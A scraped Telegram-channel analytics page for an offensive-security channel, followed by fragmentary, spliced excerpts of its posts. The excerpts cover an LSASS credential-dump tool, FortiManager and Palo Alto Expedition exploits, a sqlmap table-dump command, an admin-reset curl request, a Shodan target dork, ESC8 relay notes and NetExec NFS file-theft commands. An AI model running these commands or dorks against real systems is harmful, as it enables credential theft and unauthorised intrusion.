APT
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat
Ko'proq ko'rsatish📈 Telegram kanali APT analitikasi
APT (@apt_notes) Ingliz til segmentidagi kanali faol ishtirokchi. Hozirda hamjamiyat 15 159 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 8 491-o'rinni va Rossiya mintaqasida 43 809-o'rinni egallagan.
📊 Auditoriya ko‘rsatkichlari va dinamika
невідомо sanasidan buyon loyiha tez o‘sib, 15 159 obunachiga ega bo‘ldi.
08 Iyul, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 535 ga, so‘nggi 24 soatda esa 35 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.
- Tasdiqlash holati: Tasdiqlanmagan
- Jalb etish (ER): Auditoriya o‘rtacha 43.04% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 14.50% ini tashkil etuvchi reaksiyalarni to‘playdi.
- Post qamrovi: Har bir post o‘rtacha 6 520 marta ko‘riladi; birinchi sutkada odatda 2 197 ta ko‘rish yig‘iladi.
- Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 17 ta reaksiya keladi.
📝 Tavsif va kontent siyosati
Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“This channel discusses:
— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc
Disclaimer:
t.me/APT_Notes/6
Chat Link:
t.me/APT_Notes_PublicChat”
Yuqori yangilanish chastotasi (oxirgi ma’lumot 09 Iyul, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.
no_std and independent of the C runtime (CRT). It can be compiled as shellcode (PIC), supports XOR encryption, and remote file transmission.
🚀 Features:
— NT System Calls for Everything
— No-Std and CRT-Independent
— Position Independent Code (PIC)
— Indirect NT Syscalls
— Lean Memory Dump
— XOR Encryption
🔗 Source:
https://github.com/safedv/RustiveDump
#lsass #indirect #syscall #pic #rustFortiManager 7.6.0 FortiManager 7.4.0 through 7.4.4 FortiManager 7.2.0 through 7.2.7 FortiManager 7.0.0 through 7.0.12 FortiManager 6.4.0 through 6.4.14 FortiManager 6.2.0 through 6.2.12 FortiManager Cloud 7.4.1 through 7.4.4 FortiManager Cloud 7.2.1 through 7.2.7 FortiManager Cloud 7.0.1 through 7.0.12 FortiManager Cloud 6.4🔗 Research: https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/ 🔗 Source: https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575 #fortinet #fortimanager #fgfm #unauth #rce
BOFHound can now parse Active Directory Certificate Services (AD CS) objects, manually queried from LDAP, for review and attack path mapping within BloodHound Community Edition (BHCE).
all_in_one.latin.txt for NTLM contains 26.5 billion pairs of hash:password inside!🔥
🔗 http://weakpass.com
🐥 [ tweet ]python3 sqlmap.py -u "https://10.0.40.64/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=im port&type=test&project=pandbRBAC&signatureid=1" -p signatureid -T users --dump
CVE-2024-5910: Expedition: Missing Authentication Leads to Admin Account Takeover for attackers with network access
curl -k 'https://10.0.40.64/0S/startup/restore/restoreAdmin.php'
CVE-2024-9464: Palo Alto Expedition Authenticated Command Injection Exploit
CVE-2024-9466: Cleartext Credentials in Logs
/home/userSpace/devices/debug.txtThis world-readable file contained the raw request logs of the Expedition server when it exchanged cleartext credentials for API keys in the device integration process. The Expedition server only stores the API keys, and is not supposed to retain the cleartext credentials, but this log file showed all the credentials used in cleartext. This issue was reported and assigned CVE-2024-9466. Blog: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/ Shodan dork:
html:"Expedition Project"
Relaying SMB to HTTP (ADCS) with a modified version of krbrelay using DFSCoerce and PetitPotam - classic ESC8 attack with Kerberos, no DCOM involved ;)
NetExec nfs IP --sharesРекурсивный энум
NetExec nfs IP --enum-shares
Забираем файл
NetExec nfs IP --get-file /home/user/Desktop/test/lolkekpohek.txt lolkekpohek.txt
Заливаем файл
NetExec nfs IP --put-file lolkekpohek.txt /home/user/Desktop/
🔗 Где почитать подробнее:
Энум
https://www.netexec.wiki/nfs-protocol/enumeration
Льем/качаем файлы
https://www.netexec.wiki/nfs-protocol/download-and-upload-files
Исходники
https://github.com/Pennyw0rth/NetExec/tree/main/nxc/protocols/nfs